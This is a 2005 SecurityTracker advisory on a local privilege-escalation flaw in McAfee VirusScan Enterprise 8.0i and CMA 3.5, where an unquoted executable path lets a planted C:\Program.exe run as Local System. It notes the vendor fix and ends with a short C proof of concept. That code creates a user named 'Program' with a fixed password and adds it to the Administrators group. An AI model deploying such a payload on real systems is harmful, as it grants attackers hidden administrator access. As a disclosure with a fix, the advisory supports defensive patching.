McAfee VirusScan Bug in 'naPrdMgr.exe' Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID: 1015404|
SecurityTracker URL: http://securitytracker.com/id/1015404
(Links to External Site)
Date: Dec 23 2005
Execution of arbitrary code via local system, Root access via local system|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes |
Version(s): Enterprise Version 8.0i Patch 11|
A vulnerability was reported in McAfee VirusScan. A local user can gain elevated privileges on the target system.|
The 'naPrdMgr.exe' process invokes a particular binary application (EntVUtil.EXE) in an unsafe manner. A local user can create a specially named file containing arbitrary code. When McAfee VirusScan attempts to invoke the application, the specially named file will be invoked instead and the arbitrary code will be executed with Local System privileges.
The software attempts to run the 'C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE' file but instead will attempt to run 'C:\Program.exe' or 'C:\Program Files\Network.exe' first.
McAfee Common Management Agent 3.5 Patch 5 is also affected.
Reed Arvin discovered this vulnerability.
The original advisory is available at:
A local user can gain Local System privileges on the target system.|
The vendor has issued a fixed version (Patch 12).|
The vendor's knowledge base article (kb45256) is available at:
Vendor URL: www.mcafee.com/ (Links to External Site)
Access control error|
|Underlying OS: Windows (Any)|
Source Message Contents
Subject: Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)|
( Original article: http://reedarvin.thearvins.com/20051222-01.html )
Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11)
and CMA 3.5 (patch 5) (http://www.mcafee.com/)
By default the naPrdMgr.exe process runs under the context of the
Local System account. Every so often it will run through a process
where it does the following:
- Attempts to run \Program Files\Network Associates\VirusScan\EntVUtil.EXE
- Reads C:\Program Files\Common Files\Network Associates\Engine\SCAN.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\NAMES.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\CLEAN.DAT
The issue occurs when the naPrdMgr.exe process attempts to run the
C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE file.
Because of a lack of quotes the naPrdMgr.exe process first tries to
run C:\Program.exe. If that is not found it tries to run C:\Program
Files\Network.exe. When that is not found it finally runs the
EntVUtil.EXE file that it was originally intending to run. A malicious
user can create an application named Program.exe and place it on the
root of the C:\ and it will be run with Local System privileges by the
naPrdMgr.exe process. Source code for an example Program.exe is listed
McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)
The vendor has released knowledge base article kb45256 to address the issue.
Solution one from the vendor:
"This issue is resolved in Patch 12."
Solution two from the vendor:
"The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to
resolve the potential exploit. The new plugin is available as a HotFix
from McAfee Tier III Technical Support."
// ===== Start Program.c ======
INT main( VOID )
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user Program
Pr0gr@m$$ /add", szWinDir );
system( szCmdLine );
printf( "Adding user \"Program\" to the local Administrators group...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup
Administrators Program /add", szWinDir );
system( szCmdLine );
// ===== End Program.c ======
Discovered by Reed Arvin reedarvin[at]gmail[dot]com